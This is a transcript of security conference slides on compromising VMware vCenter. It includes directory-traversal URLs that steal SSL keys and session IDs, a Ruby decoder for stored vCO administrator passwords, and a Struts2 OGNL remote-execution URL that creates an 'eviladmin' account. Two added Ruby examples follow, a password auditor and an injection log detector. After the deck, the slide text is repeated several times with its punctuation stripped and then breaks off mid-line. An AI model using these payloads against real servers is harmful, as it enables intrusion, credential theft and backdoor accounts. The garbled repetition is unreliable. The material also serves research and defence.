Invest in security
Transcript of Invest in security
Invest in security to secure investments
How to hack VMware vCenter server in 60 seconds
Alexey Sintsov, Alexander Minozhenko

whoami
• Pen-tester at ERPScan
• Researcher
• DCG7812
• CTF

ERPScan
• Innovative company engaged in ERP security R&D
• Part of "Digital Security", a Russian group of companies founded in 2002
• Flagship product – ERPScan Security Scanner for SAP
• Tools: pen-testing tool sapsploit, web.xml scanner
• Consulting services: ERP/SRM/CRM/SCADA etc. pen-tests, SAP assessment, SAP code review
Target

VMware vCenter Server
• VMware vCenter Server is a solution to manage VMware vSphere
CVE-2009-1523
• Directory traversal in Jetty web server
• http://target:9084/vci/download/health.xml/%3f/../../../FILE
• Discovered by Claudio Criscione
• But fixed in VMware Update Manager 4.1 Update 1 :(

Directory traversal... again
• Directory traversal in Jetty web server
• http://target:9084/vci/download/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CFILE.EXT
• Discovered by Alexey Sintsov
• Metasploit module vmware_update_manager_traversal.rb by sinn3r

Directory traversal
• What file to read?
• Claudio Criscione proposed reading vpxd-profiler-* log files:
  /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
• Contains logs of SOAP requests with session IDs
VASTO
• "VASTO – collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions" http://vasto.nibblesec.org
• vmware_updatemanager_traversal.rb: Jetty path traversal
• vmware_session_rider.rb: local proxy to ride stolen SOAP ID sessions

• Fixed in version 4.1 Update 1
• Contains IP addresses
Attack
• Make ARP spoofing
• Spoof SSL certificate

Attack
• Administrators check the SSL cert

Attack
• Steal the SSL key via directory traversal: http://target:9084/vci/downloads/Documents and Settings/All Users/Application Data/VMware/VMware VirtualCenter/SSL/rui.key
• Make ARP spoofing
• Decrypt traffic with the stolen SSL key
• What if ARP spoofing does not work?
VMware vCenter Orchestrator
• VMware vCO – software for automating configuration and management
• Installed by default with vCenter
• Has an interesting file: Program files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties
• Which contains an MD5 password without salt
• Could easily be brute-forced using rainbow tables

GPU

We get in

Plain text passwords

VMware vCenter Orchestrator
• vCO stores passwords in files:
• C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
• C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties
VC.xml

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
  <virtual-infrastructure-host>
    <enabled>true</enabled>
    <url>https://new-virtual-center-host:443/sdk</url>
    <administrator-username>vmware</administrator-username>
    <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
    <pattern>u</pattern>
  </virtual-infrastructure-host>
</virtual-infrastructure-hosts>
```
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b → vmware
00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079 → vcenter
• Red bytes (the leading three digits) look like a length
• Green bytes (the following pairs) are in the ASCII range
• Black bytes (the rest) are random
Algorithm: password encoding

```java
// Fragment of the vCO encoder: pwd is the password, rnd a java.util.Random,
// nbDigits the fixed output width and result a StringBuilder that already
// holds the length prefix.
for (int i = 0; i < nbDigits; i++) {
    int value = 0;
    if (i < pwd.length()) {
        value = pwd.charAt(i);                   // take the i-th password symbol
    } else {
        value = Math.abs(rnd.nextInt() % 100);   // take a random byte
    }
    String toAdd = Integer.toHexString(value + i); // i-th password symbol + position of symbol
    result.append(toAdd);
}
```
Password Decoder

```ruby
# Reverse the vCO encoding: a three-digit decimal length, then one hex pair
# per position holding (byte + position).
def decode(pass)
  len = pass[0..2].to_i
  enc_pass = pass[3..-1].scan(/../)
  dec_pass = (0...len).collect do |i|
    byte = enc_pass[i].to_i(16)
    byte -= i
    byte.chr
  end
  dec_pass.join
end
```
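As an added example (not the authors' code and not VMware's), the following Ruby reimplements both halves of the scheme described on the two slides above and adds a small audit routine that walks a VC.xml document and reports every host whose administrator password is recoverable. nbDigits is assumed to be 32 from the 64-hex-character samples, and the VC.xml text is constructed to mirror the slide.

```ruby
require 'rexml/document'

# Output width assumed from the slide samples (32 pairs after the 3-digit length).
VCO_DIGITS = 32

# Encode exactly as the Java loop on the slide does: 3 decimal digits of length,
# then hex(byte + position) for every position, random filler after the password.
# Integer.toHexString does not zero-pad, so a small filler byte may emit one digit.
def vco_encode(pwd, nb_digits = VCO_DIGITS, rng = Random.new)
  out = format('%03d', pwd.length)
  nb_digits.times do |i|
    value = i < pwd.length ? pwd[i].ord : rng.rand(100) # Math.abs(rnd.nextInt() % 100)
    out << (value + i).to_s(16)
  end
  out
end

# Decode the first `len` pairs. Printable ASCII plus a small offset never drops
# below 0x20, so the password part is always two digits per byte; misalignment
# caused by one-digit filler bytes can only occur after the password.
def vco_decode(enc)
  return nil if enc.nil? || enc.length < 3
  len = enc[0, 3].to_i
  pairs = enc[3..-1].scan(/../)
  return nil if pairs.length < len
  bytes = (0...len).map { |i| pairs[i].to_i(16) - i }
  return nil if bytes.any? { |b| b < 0 || b > 255 }
  bytes.map(&:chr).join
end

# Audit a VC.xml document: one finding per host with a recoverable password.
def audit_vc_xml(xml_text)
  doc = REXML::Document.new(xml_text)
  findings = []
  doc.elements.each('virtual-infrastructure-hosts/virtual-infrastructure-host') do |h|
    pw = h.elements['administrator-password']
    enc = pw ? pw.text.to_s.strip : ''
    next if enc.empty?
    url = h.elements['url']
    user = h.elements['administrator-username']
    findings << { url: url && url.text, user: user && user.text, recovered: vco_decode(enc) }
  end
  findings
end

# Constructed sample mirroring the VC.xml shown on the slide.
SAMPLE_VC_XML = <<~XML
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <virtual-infrastructure-hosts>
    <virtual-infrastructure-host>
      <enabled>true</enabled>
      <url>https://new-virtual-center-host:443/sdk</url>
      <administrator-username>vmware</administrator-username>
      <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
      <pattern>*</pattern>
    </virtual-infrastructure-host>
  </virtual-infrastructure-hosts>
XML

if __FILE__ == $0
  audit_vc_xml(SAMPLE_VC_XML).each do |f|
    puts "#{f[:url]} user=#{f[:user]} administrator password is recoverable: #{f[:recovered]}"
  end
end
```

Because the position index is the only "key", the audit needs nothing beyond read access to the file, which is exactly why the slides treat this storage as plaintext.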
VMSA-2011-0005
• VMware vCenter Orchestrator uses Struts2 version 2.1.1; discovered by Digital Defense Inc.
• CVE-2010-1870: Struts2/XWork remote command execution; discovered by Meder Kydyraliev
• Fixed in 4.2
CVE-2010-1870
• OGNL – expression language for Java
• Struts2 treats each HTTP parameter name as an OGNL statement:
  http://target/login.action?page['login']=user → action.getPage().setLanguage("user")

CVE-2010-1870
• OGNL supports:
• Method calling: foo()
• Static method calling: @java.lang.System@exit(1)
• Constructor calling: new MyClass()
• Referring to variables: #foo = new MyClass()
• Context variables: #application, #session, #context

CVE-2010-1870
• Struts2 does not properly escape "#"
• Could be bypassed with unicode "\u0023"
• 2 variables need to be set for RCE:
• #_memberAccess['allowStaticMethodAccess']
• #context['xwork.MethodAccessor.denyMethodExecution']

CVE-2010-1870
• Example exploit:
• #_memberAccess['allowStaticMethodAccess'] = true
• #foo = new java.lang.Boolean(false)
• #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
• #rt = @java.lang.Runtime@getRuntime()
• #rt.exec('calc.exe')

CVE-2010-1870
• Example exploit:
  http://target:8282/login.action?(\u0023_memberAccess['allowStaticMethodAccess'])(meh)=true&(aaa)((\u0023context['xwork.MethodAccessor.denyMethodExecution']\u003d\u0023foo)(\u0023foo\u003dnew java.lang.Boolean(false)))&(asdf)((\u0023rt.exec("net user add eviladmin passWD123"))(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
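As an added example (not from the slides and not Struts or VMware code), a Ruby detector that applies the two points made above to web-server access logs: Struts2 evaluated parameter names as OGNL, and the "#" filter was bypassed with the \u0023 escape, so the detector percent-decodes each parameter name, resolves the OGNL \uXXXX escapes, and only then looks for OGNL constructs in the name. The log lines are constructed and the marker list is an assumption of this example, not an official signature.

```ruby
require 'cgi'

# OGNL constructs that have no business in a form-field name (assumed list).
OGNL_MARKERS = [
  /#/,                         # context variable access
  /_memberAccess/i,            # the sandbox object the exploit flips
  /allowStaticMethodAccess/i,
  /denyMethodExecution/i,
  /@[\w.]+@\w+/,               # static call, e.g. @java.lang.Runtime@getRuntime
  /\bnew\s+[\w.]+\s*\(/,       # constructor call
  /\.exec\s*\(/                # Runtime.exec
].freeze

# Resolve OGNL's \uXXXX escapes so that "\u0023foo" is seen as "#foo".
def unescape_ognl_unicode(s)
  s.gsub(/\\u([0-9a-fA-F]{4})/) { [$1.hex].pack('U') }
end

# Decoded parameter names of a request target; a pair without '=' is a bare name.
def param_names(target)
  query = target.split('?', 2)[1]
  return [] if query.nil?
  query.split('&').map do |pair|
    raw_name = pair.split('=', 2)[0].to_s
    unescape_ognl_unicode(CGI.unescape(raw_name))
  end
end

# Markers hit by any parameter name of the target; empty when clean.
def ognl_injection_markers(target)
  hits = []
  param_names(target).each do |name|
    OGNL_MARKERS.each { |re| hits << re.source if name =~ re }
  end
  hits.uniq
end

# Scan combined-log-format lines and return the suspicious ones with their markers.
def scan_access_log(lines)
  lines.each_with_object([]) do |line, out|
    m = line.match(/"(?:GET|POST) (\S+) HTTP/)
    next unless m
    hits = ognl_injection_markers(m[1])
    out << { line: line, target: m[1], markers: hits } unless hits.empty?
  end
end

# Constructed sample log: a normal request, a CVE-2010-1870-style request whose
# parameter names carry \u0023-escaped OGNL (shaped like the slide's URL, with
# calc.exe as payload), and another normal request.
SAMPLE_LOG = [
  '10.0.0.5 - - [12/May/2011:10:01:02 +0400] "GET /login.action?page%5B%27login%27%5D=user HTTP/1.1" 200 512',
  '10.0.0.9 - - [12/May/2011:10:01:07 +0400] "GET /login.action?(%5Cu0023_memberAccess%5B%27allowStaticMethodAccess%27%5D)(meh)=true&(aaa)((%5Cu0023context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%5Cu003d%5Cu0023foo)(%5Cu0023foo%5Cu003dnew%20java.lang.Boolean(false)))&(asdf)((%5Cu0023rt.exec(%22calc.exe%22))(%5Cu0023rt%5Cu003d@java.lang.Runtime@getRuntime()))=1 HTTP/1.1" 200 98',
  '10.0.0.5 - - [12/May/2011:10:02:30 +0400] "GET /index.action?lang=en&user=bob HTTP/1.1" 200 1040'
].freeze

if __FILE__ == $0
  scan_access_log(SAMPLE_LOG).each do |f|
    puts "suspicious request #{f[:target][0, 60]}... markers: #{f[:markers].join(', ')}"
  end
end
```

A detector that only looks at decoded values, or that stops at percent-decoding without resolving \uXXXX, misses the second line entirely, which is the point of the bypass.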
Hardening
• Update to the latest version: 4.2 update 4 or 5
• Filter administration services
• VMware vSphere Security Hardening Guide

Conclusions
• Fixed bugs are not always fixed in a proper way
• One simple bug and we can own all the infrastructure
• Passwords must be stored as salted hashes or encrypted

Thank you
a.minozhenko@dsec.ru, @al3xmin
whoami
bull Pen-tester at ERPscan Company
bull Researcher
bull DCG7812
bull CTF
ERPScan
bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of
companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for
SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review
Target
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
ERPScan
bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of
companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for
SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review
Target
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Target
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
